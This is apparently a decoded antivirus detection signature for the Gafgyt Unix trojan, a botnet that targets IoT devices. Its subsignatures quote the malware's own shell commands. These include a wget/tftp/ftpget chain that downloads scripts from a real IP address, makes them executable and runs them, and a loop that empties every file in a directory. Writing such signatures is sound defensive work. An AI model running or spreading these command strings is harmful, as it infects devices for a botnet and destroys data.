VIRUS NAME: Unix.Trojan.Gafgyt-10014360-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: 0&1&2&3&4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
tpget -u ftp 5.189.171.210 ftp1.sh ftp1.sh; chmod +x ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Attempt - %s:%s:%s
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.189.171.210/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 5.1
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
89.171.210 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 5.189.171.210; chmod +x tftp2.sh; sh tftp2.sh; f
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve
